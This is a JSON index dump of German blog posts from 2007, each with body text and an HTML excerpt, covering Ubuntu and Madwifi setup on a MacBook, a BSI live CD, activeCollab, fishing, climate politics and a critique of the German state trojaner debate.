“Knoppix” Live-CD, eine sichere Surf-CD auf Basis von Linux. Sie ist mit speziellen Sichersheitstools bestückt und enthält nur die wirklich notwendigen Programme, um im Internet zu surfen. Daten lassen sich nur über einen USB-Speicher austauschen. Ein direkter Zugriff auf die Festplatte ist aus Sicherheitsgründen nicht möglich. Schadprogramme haben so kaum noch eine Chance. […]\nWirklich eine nette Idee, das können sicher viele gebrauchen. Ich bin nur gespannt, was Herr Schäuble dazu sagt, da ja das BSI dem Innenministerium unterstellt ist.\nKann man so einer CD noch trauen? Oder ist der Bundestrojaner schon eingebaut?\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.bsi.de/presse/newslet/newslett/nl0207.htm#Veroeffentlichungen02\" target=\"_blank\"\u003eBSI\nNewsletter Ausgabe 02/2007 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eBSI entwickelt Live-CD für sicheres Surfen\u003c/strong\u003e\u003cbr\u003e\nWenn Internetnutzer online einkaufen oder Bankgeschäfte erledigen, surft\ndie Angst vor Viren, Trojanern und Phishern mit. Dafür gibt es Abhilfe:\nWenn Sicherheit beim Surfen einmal besonders wichtig ist, kann der\nRechner alternativ von einer CD mit einem speziell gesicherten\nBetriebssystem gestartet werden. Das BSI entwickelt derzeit zusammen mit\nKlaus Knopper und Martin Öhler, den Erfindern der berühmten “Knoppix”\nLive-CD, eine sichere Surf-CD auf Basis von Linux. Sie ist mit\nspeziellen Sichersheitstools bestückt und enthält nur die wirklich\nnotwendigen Programme, um im Internet zu surfen. Daten lassen sich nur\nüber einen USB-Speicher austauschen. Ein direkter Zugriff auf die\nFestplatte ist aus Sicherheitsgründen nicht möglich. Schadprogramme\nhaben so kaum noch eine Chance. […]\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-17-bsi-kundigt-knoppix-live-cd-fur-sicheres-surfen-an/","title":"BSI kündigt Knoppix-Live-CD für sicheres Surfen an"},{"body":"Ich habe heute mal Beryl am Macbook getestet, nachdem madwifi inzwischen stabil läuft.\nWar an sich keine große Aktion, mit apt-get die nötigen Pakete nachinstalliert:\nsudo apt-get install beryl beryl-manager beryl-plugins beryl-settings beryl-ubuntu emerald heliodor\nund über Anwendungen – Systemwerkzeuge – Beryl Manager gestartet. Sieht out-of-the-box schon cool aus, aber nach ein paar zusätzlichen Einstellungen und einem neuen Emerald-Theme bin ich restlos überzeugt. Der Wechsel zwischen den Fenstern und der Beryl-Cube beim Desktop-Wechsel sehen spitzenmäßig aus.\nDie einfache Installation und die anschließende grafische Konfiguration haben mich restlos überzeugt. Beryl ist mein neuer Fenstermanager. Jetzt noch Eclipse installiert und den nächsten Programmierversuchen steht nichts mehr im Weg.\n","excerpt":"\u003cp\u003eIch habe heute mal \u003ca href=\"http://www.beryl-project.org/\" target=\"_blank\"\u003eBeryl \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n am Macbook\ngetestet, nachdem \u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003emadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n inzwischen stabil\nläuft.\u003c/p\u003e\n\u003cp\u003eWar an sich keine große Aktion, mit apt-get die nötigen Pakete\nnachinstalliert:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esudo apt-get install beryl beryl-manager beryl-plugins beryl-settings beryl-ubuntu emerald heliodor\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eund über Anwendungen – Systemwerkzeuge – Beryl Manager gestartet. Sieht\nout-of-the-box schon cool aus, aber nach ein paar zusätzlichen\nEinstellungen und einem neuen Emerald-Theme bin ich restlos überzeugt.\nDer Wechsel zwischen den Fenstern und der Beryl-Cube beim\nDesktop-Wechsel sehen spitzenmäßig aus.\u003c/p\u003e\n\u003cp\u003eDie einfache Installation und die anschließende grafische Konfiguration\nhaben mich restlos überzeugt. Beryl ist mein neuer Fenstermanager. Jetzt\nnoch Eclipse installiert und den nächsten Programmierversuchen steht\nnichts mehr im Weg.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-06-beryl-auf-ubuntu-704-feisty-fawn-am-macbook/","title":"Beryl auf Ubuntu 7.04 (Feisty Fawn) am MacBook"},{"body":"vowe dot net :: Extra, extra! Read all about it! :\nExtra, extra! Read all about it! by Volker Weber There is a First Life. Eine wirklich gute Idee, die vielleicht ein paar von uns zum Überlegen bringt.\nEs gibt mehr als Web 2.0 und SL! Macht was aus eurem realen Leben und versucht nicht virtuell eure Ziele zu erreichen.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://vowe.net/archives/008420.html\" target=\"_blank\"\u003evowe dot net :: Extra, extra! Read\nall about it! \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eExtra, extra! Read all about it! \u003ca href=\"http://www.vowe.net\" target=\"_blank\"\u003eby Volker Weber \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThere is a \u003ca href=\"http://www.getafirstlife.com/\" target=\"_blank\"\u003eFirst Life. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEine wirklich gute Idee, die vielleicht ein paar von uns zum Überlegen\nbringt.\u003c/p\u003e\n\u003cp\u003eEs gibt mehr als Web 2.0 und SL! Macht was aus eurem realen Leben und\nversucht nicht virtuell eure Ziele zu erreichen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-05-there-is-a-first-life/","title":"There is a first life"},{"body":"Ich habe heute morgen in den Kommentaren des vorhergehenden Artikels den Hinweis bekommen, daß mit dem Branch 0.9.30.13 von Madwifi auch WPA-Verschlüsselung funktionieren soll.\nEs klappt wirklich! Ich habe die Sourcen heruntergeladen\nsvn co http://svn.madwifi.org/branches/madwifi-hal-0.9.30.13\nund mit\nmake KERNELPATH=/usr/src/linux-headers-2.6.20-15-generic/\u0026lt;br /\u0026gt; make install\u0026lt;br /\u0026gt; modprobe ath_pci\nins System eingebunden. Der Network-Manager findet sofort meinen Airport Express Router und fragt das Passwort ab.\nVielen Dank an Lox!\nUpdate 4.5.07: Der Treiber läuft soweit stabil. So ca. alle 20-30 Minuten beendet sich die Verbindung, wird aber innerhalb weniger Sekunden neu aufgebaut und stört daher nicht weiter. Ich nutze im Moment Feisty Fawn (Ubuntu 7.04) 64-Bit und es läuft wunderbar. Weitere Tests und Konfigurationen folgen.\n","excerpt":"\u003cp\u003eIch habe heute morgen in den\n\u003ca href=\"https://www.stoeps.de/2007/05/01/ubuntu-feisty-fawn-und-macbook-core2duo/#comments\" target=\"_blank\"\u003eKommentaren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ndes vorhergehenden Artikels den Hinweis bekommen, daß mit dem\n\u003ca href=\"http://svn.madwifi.org/branches/madwifi-hal-0.9.30.13\" target=\"_blank\"\u003eBranch 0.9.30.13 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nvon \u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003eMadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n auch WPA-Verschlüsselung\nfunktionieren soll.\u003c/p\u003e\n\u003cp\u003eEs klappt wirklich! Ich habe die Sourcen heruntergeladen\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esvn co http://svn.madwifi.org/branches/madwifi-hal-0.9.30.13\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eund mit\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003emake KERNELPATH=/usr/src/linux-headers-2.6.20-15-generic/\u0026lt;br /\u0026gt; make install\u0026lt;br /\u0026gt; modprobe ath_pci\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eins System eingebunden. Der Network-Manager findet sofort meinen Airport\nExpress Router und fragt das Passwort ab.\u003c/p\u003e\n\u003cp\u003eVielen Dank an Lox!\u003c/p\u003e\n\u003ch1 id=\"update-4507\"\u003eUpdate 4.5.07: \u003ca href=\"#update-4507\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDer Treiber läuft soweit stabil. So ca. alle 20-30 Minuten beendet sich\ndie Verbindung, wird aber innerhalb weniger Sekunden neu aufgebaut und\nstört daher nicht weiter. Ich nutze im Moment Feisty Fawn (Ubuntu 7.04)\n64-Bit und es läuft wunderbar. Weitere Tests und Konfigurationen folgen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-03-madwifi-branch-093013-wpa-funktioniert/","title":"Madwifi Branch 0.9.30.13 – WPA funktioniert (Update)"},{"body":"Ich habe jetzt die Linux-Partition meines Macbooks nochmals neu installiert und dazu die 64-Bit Version der Ubuntu Install/Live-CD genommen.\nDie Installation lief schnell und unproblematisch ab. Ich habe noch ein paar Finetunings nach der Anleitung im Ubuntuwiki eingestellt. Dummerweise habe ich der Anleitung geglaubt, daß man ndiswrapper nicht mehr benötigt und der neue\nBranch von Madwifi funktioniert. Deshalb habe ich die Neuinstallation eigentlich gemacht, da ich dachte, daß ich den Madwifi-Treiber zum Laufen bringe.\nDer neue Madwifi-Branch funktioniert leider immer noch nicht mit WPA und WPA2! Naja nicht weiter schlimm, dann halt ndiswrapper…\nLeider nicht, ndiswrapper erwartet einen 64-Bit Treiber, da ich ja den 64-Bit Kernel installiert habe. Bei meinen Recherchen ist mir kein 64-Bit Windowstreiber untergekommen. Es bleibt also nichts übrig, als auf einen funktionieren Madwifi-Treiber zu warten, wenn man das Macbook mit 64-Bit betreiben möchte.\nWer einen Treiber weiß, bitte melden!\n","excerpt":"\u003cp\u003eIch habe jetzt die Linux-Partition meines Macbooks nochmals neu\ninstalliert und dazu die 64-Bit Version der Ubuntu Install/Live-CD\ngenommen.\u003c/p\u003e\n\u003cp\u003eDie Installation lief schnell und unproblematisch ab. Ich habe noch ein\npaar Finetunings nach der Anleitung im\n\u003ca href=\"https://help.ubuntu.com/community/MacBook\" target=\"_blank\"\u003eUbuntuwiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n eingestellt.\nDummerweise habe ich der Anleitung geglaubt, daß man ndiswrapper nicht\nmehr benötigt und der neue\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://snapshots.madwifi.org/madwifi-hal-0.9.30.10/\" target=\"_blank\"\u003eBranch von Madwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nfunktioniert. Deshalb habe ich die Neuinstallation eigentlich gemacht,\nda ich dachte, daß ich den Madwifi-Treiber zum Laufen bringe.\u003c/p\u003e\n\u003cp\u003eDer neue Madwifi-Branch funktioniert leider immer noch nicht mit WPA und\nWPA2! Naja nicht weiter schlimm, dann halt ndiswrapper…\u003c/p\u003e\n\u003cp\u003eLeider nicht, ndiswrapper erwartet einen 64-Bit Treiber, da ich ja den\n64-Bit Kernel installiert habe. Bei meinen Recherchen ist mir kein\n64-Bit Windowstreiber untergekommen. Es bleibt also nichts übrig, als\nauf einen funktionieren Madwifi-Treiber zu warten, wenn man das Macbook\nmit 64-Bit betreiben möchte.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-05-01-ubuntu-feisty-fawn-und-macbook-core2duo/","title":"Ubuntu Feisty Fawn und Macbook Core2Duo"},{"body":"Am Montag war ich mit Flo am Hartsee in Eggstätt beim Hegenenfischen auf Renken.\nAm Echolot waren viele Fische in unterschiedlichsten Tiefen zu sehen, aber leider nicht ein Biss. Keine Ahnung was nicht gepaßt hat. Das Wetter war herrlich, aber weder über Grund (bis 30m) noch im oberen Gewässerdrittel konnte die Hegene einen Fisch verführen.\n","excerpt":"\u003cp\u003eAm Montag war ich mit \u003ca href=\"http://www.fmb-net.de\" target=\"_blank\"\u003eFlo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n am Hartsee in Eggstätt\nbeim Hegenenfischen auf Renken.\u003c/p\u003e\n\u003cp\u003eAm Echolot waren viele Fische in unterschiedlichsten Tiefen zu sehen,\naber leider nicht ein Biss. Keine Ahnung was nicht gepaßt hat. Das\nWetter war herrlich, aber weder über Grund (bis 30m) noch im oberen\nGewässerdrittel konnte die Hegene einen Fisch verführen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-25-renkenfischen-am-hartsee/","title":"Renkenfischen am Hartsee"},{"body":"Der neue (Alpha-) Branch von Madwifi hat immer noch Probleme mit der Verschlüsselung. In den letzten Tickets wird vermutet, daß der Fehler in der HAL liegt und man warten muss, bis der Entwickler, der sich mit der HAL auskennt Zeit hat, sich mit dem Problem zu beschäftigen.\nDie Verbindung wird auf jeden Fall aufgebaut, Problem unter WPA2 ist, daß der 4-Way Handshake immer wieder verworfen wird. Selbst aktuelle wpa_supplicant Pakete helfen da nichts.\n","excerpt":"\u003cp\u003eDer neue (Alpha-) Branch von \u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003eMadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n hat immer\nnoch Probleme mit der Verschlüsselung. In den letzten Tickets wird\nvermutet, daß der Fehler in der HAL liegt und man warten muss, bis der\nEntwickler, der sich mit der HAL auskennt Zeit hat, sich mit dem Problem\nzu beschäftigen.\u003c/p\u003e\n\u003cp\u003eDie Verbindung wird auf jeden Fall aufgebaut, Problem unter WPA2 ist,\ndaß der 4-Way Handshake immer wieder verworfen wird. Selbst aktuelle\nwpa_supplicant Pakete helfen da nichts.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-19-madwifi-on-macbook-ohne-verschlusselung/","title":"Madwifi on Macbook ohne Verschlüsselung"},{"body":"heise online – Ubuntu 7.04 ist da :\nWie angekündigt hat das Ubuntu-Team am heutigen Donnerstag die neue Version 7.04 (Feisty Fawn) veröffentlicht.\nFeisty Fawn ist stable und wurde heute wie angekündigt von den Entwicklern freigegeben. Einen Testbericht gibt es bereits auf heise open.\nMein Macbook läuft bereits ein paar Wochen mit einem Developer Release von Feisty Fawn und ich bin sehr zufrieden. Es wirkt aufgeräumt und läßt zumindest von meiner Seite keine Wünsche offen.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/88515/from/atom10\" target=\"_blank\"\u003eheise online –\nUbuntu 7.04 ist da \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWie angekündigt hat das Ubuntu-Team am heutigen Donnerstag die neue\nVersion 7.04 (Feisty Fawn) veröffentlicht.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eFeisty Fawn ist stable und wurde heute wie angekündigt von den\nEntwicklern freigegeben. Einen Testbericht gibt es bereits auf heise\nopen.\u003c/p\u003e\n\u003cp\u003eMein Macbook läuft bereits ein paar Wochen mit einem Developer Release\nvon Feisty Fawn und ich bin sehr zufrieden. Es wirkt aufgeräumt und läßt\nzumindest von meiner Seite keine Wünsche offen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-19-ubuntu-704-ist-veroffentlicht/","title":"Ubuntu 7.04 ist veröffentlicht"},{"body":"Unter activeCollab findet man eine Web-Software für Projektmanagement. Auf den ersten Blick sieht die Software viel versprechend aus. Ich habe sie mir installiert (dauert ca. 5 Minuten).\nBenötigt werden:\nApache 2.0+\nPHP 5.1+ (mit folgenden Erweiterungen: MySQL, GD, SimpleXML)\nMySQL 4.1+ mit InnoDB support\nAlso ein Standard-LAMP/MAMP/XAMP Server sollte genügen. Ich habe activeCollab eine eigene Datenbank zugeteilt, es werden aber auch Table-prefixes vergeben, so dass man sie auch mit anderen Anwendung nebeneinander einsetzen kann.\nEs gibt eine deutsche Übersetzung und soweit ich gesehen habe, ist die Übersetzung gut gelungen.\n","excerpt":"\u003cp\u003eUnter \u003ca href=\"http://www.activeCollab.com\" target=\"_blank\"\u003eactiveCollab \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n findet man eine\nWeb-Software für Projektmanagement. Auf den ersten Blick sieht die\nSoftware viel versprechend aus. Ich habe sie mir installiert (dauert ca.\n5 Minuten).\u003cbr\u003e\nBenötigt werden:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://httpd.apache.org/\" target=\"_blank\"\u003eApache \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 2.0+\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.php.net\" target=\"_blank\"\u003ePHP \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 5.1+ (mit folgenden Erweiterungen: MySQL, GD,\nSimpleXML)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.mysql.org\" target=\"_blank\"\u003eMySQL \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 4.1+ mit InnoDB support\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eAlso ein Standard-LAMP/MAMP/XAMP Server sollte genügen. Ich habe\n\u003ca href=\"http://www.activecollab.com\" target=\"_blank\"\u003eactiveCollab \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n eine eigene Datenbank\nzugeteilt, es werden aber auch Table-prefixes vergeben, so dass man sie\nauch mit anderen Anwendung nebeneinander einsetzen kann.\u003cbr\u003e\nEs gibt eine deutsche\n\u003ca href=\"http://www.activecollab.com/pages/33/activecollab/translations/\" target=\"_blank\"\u003eÜbersetzung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nund soweit ich gesehen habe, ist die Übersetzung gut gelungen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-16-activecollab-webgestutztes-projektmanagement/","title":"activeCollab – Webgestütztes Projektmanagement"},{"body":"Schneier on Security: German Police Want the Right to Hack Computers :\nGerman Police Want the Right to Hack Computers\nJetzt interessiert sich sogar der Security-Papst Bruce Schneier für das Vorgehen der deutschen Strafverfolger. Es sind v.a. die Kommentare und die darin enthaltenen Links interessant!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.schneier.com/blog/archives/2007/04/german_police_w.html\" target=\"_blank\"\u003eSchneier\non Security: German Police Want the Right to Hack Computers \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eGerman Police Want the Right to Hack Computers\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eJetzt interessiert sich sogar der Security-Papst Bruce Schneier für das\nVorgehen der deutschen Strafverfolger. Es sind v.a. die Kommentare und\ndie darin enthaltenen Links interessant!\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-14-schneier-on-security-german-police-wants-the-right-to-hack-computers/","title":"Schneier on Security – German Police wants the right to hack computers"},{"body":"Neues Kohlekraftwerk in Boxberg sabotiert Klimaschutz – Greenpeace, Nachrichten zum Thema Klima :\nDie Bundesregierung fördert dies, indem sie den Energiekonzernen die Verschmutzungsrechte zum CO2-Ausstoß schenkt.\nTrotz öffentlicher Bekenntnissen der Bundesregierung zur Emissionsminderung wurde am Donnerstag der Grundstein für den neuen Kraftwerksblock von Vattenfall in Boxberg gelegt. Ausser diesem Braunkohle-Kraftwerk werden ausserdem noch 45 weitere Kohlekraftwerke geplant.\nBei genauer Betrachtung ist das Kraftwerk in Boxberg auch wirtschaftlich nicht tragbar. Müsste Vattenfall die Zertifikate für CO2-Emissionen auf dem freien Markt kaufen, würde sich die Verbrennung von Braunkohle nicht lohnen. Letztlich zahlen so die Verbraucher die Zeche für die Energiekonzerne: über den Strompreis, die Steuern und nicht zuletzt über die Auswirkungen des Klimawandels.\nBesonders übel finde ich, daß der Vattenfall-Chef “Klimaschutzberater” der Bundesregierung ist.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.greenpeace.de/themen/klima/nachrichten/artikel/neues_kohlekraftwerk_in_boxberg_sabotiert_klimaschutz-1/\" target=\"_blank\"\u003eNeues\nKohlekraftwerk in Boxberg sabotiert Klimaschutz – Greenpeace,\nNachrichten zum Thema Klima \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDie Bundesregierung fördert dies, indem sie den Energiekonzernen die\nVerschmutzungsrechte zum CO2-Ausstoß schenkt.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eTrotz öffentlicher Bekenntnissen der Bundesregierung zur\nEmissionsminderung wurde am Donnerstag der Grundstein für den neuen\nKraftwerksblock von Vattenfall in Boxberg gelegt. Ausser diesem\nBraunkohle-Kraftwerk werden ausserdem noch 45 weitere Kohlekraftwerke\ngeplant.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eBei genauer Betrachtung ist das Kraftwerk in Boxberg auch wirtschaftlich\nnicht tragbar. Müsste Vattenfall die Zertifikate für CO2-Emissionen auf\ndem freien Markt kaufen, würde sich die Verbrennung von Braunkohle nicht\nlohnen. Letztlich zahlen so die Verbraucher die Zeche für die\nEnergiekonzerne: über den Strompreis, die Steuern und nicht zuletzt über\ndie Auswirkungen des Klimawandels.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-14-greenpeace-neues-kohlekraftwerk-in-boxberg-wird-durch-bund-gefordert/","title":"Greenpeace – Neues Kohlekraftwerk in Boxberg wird durch Bund gefördert"},{"body":"Ich habe es jetzt endlich geschafft, den Podcast des CCC zum Bundestrojaner anzuhören.\nEs ist für mich echt erstaunlich, wie andere Leute über dieses Thema denken. Es gab viele Anrufer, die gegen die Überwachung sind, einer der Anrufer (Christopher) hat mich dann doch wegen seiner Blauäugigkeit geärgert. Diese Einstellung, solange es mir nicht weh tut, ist mir staatliche Überwachung egal, findet man leider sehr oft.\nEr diskutierte v.a. mit den “Totschlag-Argumenten:\nWir müssen was gegen Terroristen tun!\nMan muss es den Kriminellen schwer machen.\nEs fehlte noch die Kinderpornografie\nIm Prinzip ist das genau die Argumentation, die uns von den Sicherheitsbehörden und Standard-Medien vorgekaut wird.\nIch frage mich im Moment sowieso, warum sich ein Großteil der Bevölkerung von der Meinungsmache von bunten Tageszeitungen oder Illustrierten so stark beeinflussen läßt. Es war noch nie so leicht kostenlos an Informationen zu kommen! Warum nutzen das nicht mehr Leute? Klar “Sex sells”, aber es kann doch nicht der Sinn der Technik sein, daß man leichter an Pornographie kommt! In vielen Staaten gibt es Zensur, die auch von den großen Suchmaschinen (Google, Yahoo) unterstützt wird. Es werden also nur passende Suchtreffer gezeigt.\nBei uns wird uns von Politik und Medien jede Woche ein neues Thema aufgetischt, das dann von allen ausgeschlachtet wird.\nDie Möglichkeiten des Bundestrojaners greift so stark in das Privatleben der Bürger ein, die meiner Meinung nach auch nicht überwacht werden kann. Wie will man beweisen, daß man selbst keine Daten auf dem Rechner verändert hat? Wenn man schon mit Schwerkriminellen argumentiert, dann sollte man auch versuchen, diese verurteilen zu können und nicht den Anwälten noch mehr Ansatzpunkte zu geben ihre Mandanten freizubekommen. Die Beweislast für die Behörden halte ich für sehr schwierig bis unmöglich.\nBetriebssysteme Ich denke nicht, daß die Leute der Strafverfolgung schon über die Problematik der unterschiedlichen Betriebssysteme gehört haben. Es würde also für Kriminelle/Terroristen reichen, wenn sie ihr Betriebssystem wechseln. Vielleicht wäre ja der Bundestrojaner der Durchbruch für Linux und GnuPG auf den Desktops.\nDer Bundestrojaner ist mindestens so unglaubwürdig wie “Independence Day”. Oder haben alle Ausserirdischen Computer mit Mac OS oder Windows, dem man dann einen Virus unterschieben kann?\nAlso warum viel Geld ausgeben, einen sinnlosen Trojaner entwickeln zu lassen? Die Strafermittler sollten weniger auf diese technische Pseudohilfen hoffen, als viel mehr die Ermittler aufzustocken. Ich denke nicht, daß es eine bessere Möglichkeit gibt, die Bürger zu schützen, als gut ausgebildete Ermittler.\nSolange Dinge geschehen wie die Sparmaßnahmen bei der Polizei Brandenburg , sollte man hier das Geld anlegen!\nBehördliches Hacking Oder will man versuchen gute Hacker in staatliche Dienste zu stellen, um auf die Rechner zu gelangen? Dann bleibt immer noch die Beweislast. Mehr als Indizien dürften also nicht gefunden werden.\nComputersicherheit Ist eigentlich das BSI noch glaubwürdig, wenn der Online-Zugriff für Strafverfolger zulässig wird? Das BSI ist dem Innenministerium unterstellt. Wenn wir also in Zukunft Sicherheitstipps vom BSI lesen, dann wissen wir nicht, ob diese nicht vom Innenministerium vorgefiltert ist. Werden bekannte Sicherheitslücken wirklich schnellstmöglich gefixt?\nIST Laut CCC ist so etwas wie der Bundestrojaner bereits im Einsatz. Die Geheimdienste haben genug Rechte, um auch heimlich Festplatten auszuspähen. Selbst PCs hinter DSL-Routern sind kein Problem. Der CCC empfiehlt freie Betriebssysteme einzusetzen, um besser geschützt zu sein.\nMan weiß nämlich nicht, ob die kommerziellen Hersteller nicht Backdoors für die Geheimdienste eingebaut haben.\nEs geht also weniger darum, wie die technische Umsetzung möglich ist, oder ob es genügend Backdoors gibt, um allen Verdächtigen die Rechner zu scannen. Die Frage ist, ob wir mit einer so weitreichenden Berechtigung für das BKA und die Landeskrimalämter noch näher an einen Überwachungsstaat herankommen.\n… to be continued\nLinks Chaosradio Wiki zur Sendung ","excerpt":"\u003cp\u003eIch habe es jetzt endlich geschafft, den\n\u003ca href=\"http://chaosradio.ccc.de/chaosradio-latest.rss\" target=\"_blank\"\u003ePodcast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n des\n\u003ca href=\"http://www.ccc.de\" target=\"_blank\"\u003eCCC \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"http://chaosradio.ccc.de/cr122.html\" target=\"_blank\"\u003ezum\nBundestrojaner \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n anzuhören.\u003c/p\u003e\n\u003cp\u003eEs ist für mich echt erstaunlich, wie andere Leute über dieses Thema\ndenken. Es gab viele Anrufer, die gegen die Überwachung sind, einer der\nAnrufer (Christopher) hat mich dann doch wegen seiner Blauäugigkeit\ngeärgert. Diese Einstellung, solange es mir nicht weh tut, ist mir\nstaatliche Überwachung egal, findet man leider sehr oft.\u003c/p\u003e\n\u003cp\u003eEr diskutierte v.a. mit den “Totschlag-Argumenten:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eWir müssen was gegen Terroristen tun!\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMan muss es den Kriminellen schwer machen.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEs fehlte noch die Kinderpornografie\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIm Prinzip ist das genau die Argumentation, die uns von den\nSicherheitsbehörden und Standard-Medien vorgekaut wird.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-04-14-podcast-zum-bundestrojaner/","title":"Podcast zum Bundestrojaner"},{"body":"So,\nentschuldigt bitte, daß die letzten Tage keine neuen Posts erschienen sind, aber ich habe mehrere Abende und Zugfahrten mit der Erstellung des neuen Themes verbracht.\nAls Grundlage habe ich das YAML Framework benutzt, da mit YAML praktisch alle wichtigen Browser unterstützt werden. Die dazu passende Texte und PHP-Skripte habe ich aus der deutschen Übersetzung des Default WordPress Themes genommen, das mit dem Komplettpaket unter WordPress Deutschland heruntergeladen werden kann.\nDas WordPress YAML Paket habe ich nicht getestet, da mir das zu viele Pakete zum Download waren. :-)\nViel Spaß mit dem neuen Layout!\n","excerpt":"\u003cp\u003eSo,\u003c/p\u003e\n\u003cp\u003eentschuldigt bitte, daß die letzten Tage keine neuen Posts erschienen\nsind, aber ich habe mehrere Abende und Zugfahrten mit der Erstellung des\nneuen Themes verbracht.\u003c/p\u003e\n\u003cp\u003eAls Grundlage habe ich das \u003ca href=\"http://www.yaml.de\" target=\"_blank\"\u003eYAML \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Framework benutzt,\nda mit YAML praktisch alle wichtigen Browser unterstützt werden. Die\ndazu passende Texte und PHP-Skripte habe ich aus der deutschen\nÜbersetzung des Default WordPress Themes genommen, das mit dem\nKomplettpaket unter \u003ca href=\"http://wordpress-deutschland.org\" target=\"_blank\"\u003eWordPress\nDeutschland \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n heruntergeladen werden kann.\u003c/p\u003e\n\u003cp\u003eDas WordPress YAML Paket habe ich nicht getestet, da mir das zu viele\nPakete zum Download waren. :-)\u003c/p\u003e\n\u003cp\u003eViel Spaß mit dem neuen 